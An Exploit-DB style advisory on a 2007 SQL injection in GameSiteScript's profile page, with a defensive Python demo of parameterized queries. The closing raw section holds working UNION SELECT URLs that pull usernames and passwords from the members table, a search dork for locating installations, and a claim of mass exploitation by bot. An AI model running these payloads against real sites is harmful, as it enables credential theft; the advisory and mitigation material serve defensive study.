Vendor: GameSiteScript
By: Xenduer77
CVSS: N/A
Vulnerability type: SQL-Injection
Product Name: GameSiteScript
Affected Version From: Prior to version 3.1
Affected Version To: Version 3.1
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested: Unknown
Year: 2007

GameSiteScript (Profile)($id) SQL-Injection Exploit

This exploit performs SQL injection against the GameSiteScript profile view page (profile/view, reached through the params argument of index.php). The vulnerability was discovered by Xenduer77 on July 7th, 2007. It exists because the {$id} input parameter is concatenated directly into the SQL query without validation or escaping, so a crafted value can change the structure of the query and read other columns of the members table.

Mitigation:

The vendor should validate the $id input and pass it to the database through a parameterized (prepared) query instead of interpolating it into the SQL string, so that user-supplied data can never alter the structure of the query.
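As an added illustration (not code from GameSiteScript, the advisory, or Exploit-DB), the following Python snippet uses an in-memory SQLite table as a stand-in for the application's members table and shows both halves of that mitigation side by side: the vulnerable pattern the advisory describes (the id spliced into the SQL text) next to a parameterized query, plus a validation check on the id before it reaches the database. The table layout, column names, sample rows, and the three-column payload shape are constructed for this example.

```python
import re
import sqlite3

# Constructed stand-in for the application's members table (names and rows are
# made up for this example; only the username/password columns echo the advisory).
SAMPLE_MEMBERS = [
    ("1", "admin", "hash-of-admin-password", "site administrator"),
    ("2", "alice", "hash-of-alice-password", "regular player"),
]


def make_db():
    """Create an in-memory SQLite database holding a small members table."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE members (id TEXT PRIMARY KEY, username TEXT, password TEXT, bio TEXT)"
    )
    conn.executemany("INSERT INTO members VALUES (?, ?, ?, ?)", SAMPLE_MEMBERS)
    conn.commit()
    return conn


def profile_view_vulnerable(conn, id_param):
    """The defect pattern from the advisory: {$id} is spliced into the SQL text.

    Quote characters inside id_param become part of the query grammar, so the
    input can close the string literal and append a UNION SELECT clause.
    """
    sql = f"SELECT id, username, bio FROM members WHERE id='{id_param}'"
    return conn.execute(sql).fetchall()


def profile_view_parameterized(conn, id_param):
    """The fix: the value is bound as a parameter and is never parsed as SQL."""
    sql = "SELECT id, username, bio FROM members WHERE id=?"
    return conn.execute(sql, (id_param,)).fetchall()


# Profile ids in this example are short decimal integers (an assumption about
# the application); anything else is rejected before it reaches the database.
_PROFILE_ID = re.compile(r"[0-9]{1,10}")


def is_valid_profile_id(id_param):
    """True only for a plain decimal id; fullmatch rejects trailing characters."""
    return _PROFILE_ID.fullmatch(id_param) is not None


def profile_view_hardened(conn, id_param):
    """Input validation plus a parameterized query; any malformed id yields []."""
    if not is_valid_profile_id(id_param):
        return []
    return profile_view_parameterized(conn, id_param)


if __name__ == "__main__":
    db = make_db()
    # Same shape as the advisory's payload, reduced to this query's three
    # columns: the first SELECT matches nothing, the UNION pulls in the password.
    injected = "' UNION SELECT 0,password,0 FROM members WHERE id='1"
    print("vulnerable:   ", profile_view_vulnerable(db, injected))
    print("parameterized:", profile_view_parameterized(db, injected))
    print("hardened:     ", profile_view_hardened(db, injected), profile_view_hardened(db, "1"))
```

Run against the constructed table, the vulnerable function returns a row carrying the admin password hash for the injected value, while the parameterized query treats the whole string as a (non-matching) id and returns nothing; the validation layer rejects the value before any query runs, which is the defense-in-depth the advisory's mitigation calls for.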

Exploit-DB raw data:

###############################################
####### GameSiteScript (Profile)($id) SQL-Injection Exploit
###############################################
### Vulnerability Discovered By: Xenduer77
### ---July 7th, 2007
###############################################

{$id} Is passed straight to the query without being filtered.

###############################################
SQL-INJECTION:
###############################################

For Version 3.1:
-------
http://whatever.com/iindex.php?params=profile/view/'+union+select+0,username,0,0,0,0,0,0,0,0,0,0,0,0,password,0,0,0,0,0,0,0,0+from+members+where+id='1

Prior To 3.1:
-------
http://whatever.com/index.php?params=profile/view/'+union+select+0,username,0,0,0,0,0,0,0,0,0,0,0,0,password,0,0,0,0,0,0+from+members+where+id='1

###Tested by a bot on 27 sites, 22 were exploited.

###############################################

Dork: "Powered by GameSiteScript"

###############################################

# milw0rm.com [2007-07-07]